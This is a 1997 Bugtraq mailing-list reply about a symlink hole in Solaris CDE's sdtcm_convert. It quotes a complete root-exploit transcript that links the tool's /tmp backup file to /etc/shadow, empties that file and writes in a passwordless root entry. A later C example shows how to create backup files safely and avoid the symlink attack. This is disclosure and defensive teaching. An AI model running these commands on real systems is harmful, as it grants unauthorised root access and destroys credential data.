[4086] in bugtraq
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
daemon@ATHENA.MIT.EDU (Shumon Huque)
Sun Feb 23 16:38:27 1997
Date: Sun, 23 Feb 1997 15:40:43 -0500
Reply-To: Shumon Huque <shuque@SAS.UPENN.EDU>
From: Shumon Huque <shuque@SAS.UPENN.EDU>
X-To: adam@MATH.TAU.AC.IL
To: BUGTRAQ@netspace.org
In-Reply-To: <199702231045.MAA00882@lune.math.tau.ac.il> from "Adam Morrison"
at Feb 23, 97 12:45:40 pm
I don't know what exactly 103670-02 fixed but this exploit didn't work
on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink
/tmp/calorig.user was removed and replaced by a plain file owned
by user.
>
> > Is this the bug fixed in the Sun patches:
> > 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> > 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> > 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> > 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> > or is it a new one?
>
> That's hard to know, since this patch is not publicly available off
> SunSolve (not right now, anyway).
>
> There's at least one other hole in sdtcm_convert which this patch may or not
> fix.
>
> CDE is generally a can of worms.
>
>
> $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
>
> Script started on Thu Jul 11 22:15:03 1996
> 22:15 [wumpus:~] % whoami
> adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
> 22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
> 22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
> Loading the calendar ...
>
> WARNING!! Data will be lost when converting version 4 data format
> back to version 3 data format.
>
> Do you want to continue? (Y/N) [Y] y
>
> Doing conversion ...
> Writing out new file ...
> Conversion done successfully.
> Total number of appointments = 0
> Number of one-time appointments converted = 0
> Number of repeating appointments converted = 0
> Number of one-time appointments pruned = 0
> Number of repeating appointments pruned = 0
> The original file is saved in /tmp/calorig.adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % chmod 644 /etc/shadow
> 22:15 [wumpus:~] % cp /dev/null /etc/shadow
> cp: overwrite /etc/shadow (y/n)? y
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
> 22:16 [wumpus:~] % su
> # id
> uid=0(root) gid=1(other)
> # exit
>
> script done on Thu Jul 11 22:16:21 1996
>
>
>
> adam?
>
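The quoted transcript shows the tool's backup file /tmp/calorig.<user> being written through a pre-planted symlink, and the reply reports that the patched tool removes such a symlink and writes a plain user-owned file instead. The C program below is an added example for this thread, not sdtcm_convert's or Sun's code and not what patch 103670-02 actually does: it places a naive create-or-truncate next to a hardened creator that opens with O_CREAT|O_EXCL|O_NOFOLLOW and verifies the result through fstat(), then runs both against a constructed scratch directory in which a 6-byte "protected" file stands in for /etc/shadow. It assumes a modern POSIX system (Linux/glibc); the names naive_create_backup, safe_create_backup, run_demo and the scratch-directory layout are assumptions of this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive backup creation: open the name create-or-truncate. If a symlink was
 * planted at that name beforehand, open() follows it and truncates whatever
 * it points to; any later chmod()/chown() by name lands on the target too. */
int naive_create_backup(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened backup creation: refuse to reuse anything already at the name.
 * O_CREAT|O_EXCL fails with EEXIST when the name exists at all, including a
 * symbolic link, wherever that link points. O_NOFOLLOW is a second,
 * independent refusal of symlinks. The mode is set atomically at creation;
 * nothing is ever chmod()ed or chown()ed by path name afterwards. */
int safe_create_backup(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                 /* typically EEXIST: something was planted */

    /* Inspect the object through the descriptor, never through the name. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EEXIST;
        return -1;
    }
    return fd;
}

struct demo_result {
    int   rc;          /* creator's return value (fd or -1) */
    int   err;         /* errno when rc < 0 */
    off_t target_size; /* size of the protected file afterwards; 6 = untouched */
};

/* Constructed scenario mirroring the transcript: a 6-byte "protected" file
 * stands in for /etc/shadow and, when plant_symlink is set, the name
 * calorig.user is a symlink to it created before the "tool" runs. Everything
 * lives in a fresh mkdtemp() directory and is removed afterwards. */
struct demo_result run_demo(int use_safe, int plant_symlink)
{
    struct demo_result r = { -1, 0, -1 };
    char dir[] = "/tmp/calbk-XXXXXX";
    char target[128], backup[128];
    struct stat st;
    int fd;

    if (mkdtemp(dir) == NULL)
        return r;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(backup, sizeof backup, "%s/calorig.user", dir);

    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "secret", 6) != 6 ||
        (plant_symlink && symlink(target, backup) < 0)) {
        if (fd >= 0)
            close(fd);
        goto cleanup;
    }
    close(fd);

    errno = 0;
    r.rc = use_safe ? safe_create_backup(backup) : naive_create_backup(backup);
    r.err = errno;
    if (r.rc >= 0)
        close(r.rc);

    if (stat(target, &st) == 0)
        r.target_size = st.st_size;

cleanup:
    unlink(backup);
    unlink(target);
    rmdir(dir);
    return r;
}

int main(void)
{
    struct demo_result a = run_demo(0, 1), b = run_demo(1, 1), c = run_demo(1, 0);
    printf("naive, symlink planted : rc=%d target_size=%ld\n", a.rc, (long)a.target_size);
    printf("safe,  symlink planted : rc=%d errno=%s target_size=%ld\n",
           b.rc, strerror(b.err), (long)b.target_size);
    printf("safe,  clean directory : rc=%d target_size=%ld\n", c.rc, (long)c.target_size);
    return 0;
}
```

Compile with `cc -Wall` and run: the naive run reports the stand-in file truncated to 0 bytes, the hardened run fails with EEXIST and leaves it at 6 bytes, and the hardened run in a clean directory succeeds. Remove-then-create, which is how the reply describes the patched behaviour, still leaves a window between the unlink and the open in which a link can be re-planted; O_EXCL creation fails closed instead, and keeping backups out of shared directories such as /tmp removes the precondition altogether.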